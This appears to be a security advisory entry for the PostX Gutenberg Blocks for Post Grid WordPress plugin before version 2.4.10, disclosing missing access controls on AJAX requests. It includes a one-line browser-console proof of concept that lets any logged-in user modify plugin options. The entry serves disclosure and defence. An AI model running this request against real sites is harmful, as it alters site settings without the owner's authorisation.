WordPress Plugin Vulnerabilities
PostX Gutenberg Blocks for Post Grid < 2.4.10 - Missing Access Controls
Description
The plugin performs incorrect checks before allowing any logged in user to perform some ajax based requests, allowing any user to modify, delete or add ultp_options values.
Proof of Concept
You can run this from a browser's javascript console: jQuery.post(ajaxurl,{action:"ultp_addon",addon:"ultp_templates",value:"false",wpnonce:"a"})
Affects Plugins
References
CVE
Classification
Type
ACCESS CONTROLS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-17 (about 2 years ago)
Added
2021-08-26 (about 2 years ago)
Last Updated
2023-01-27 (about 1 years ago)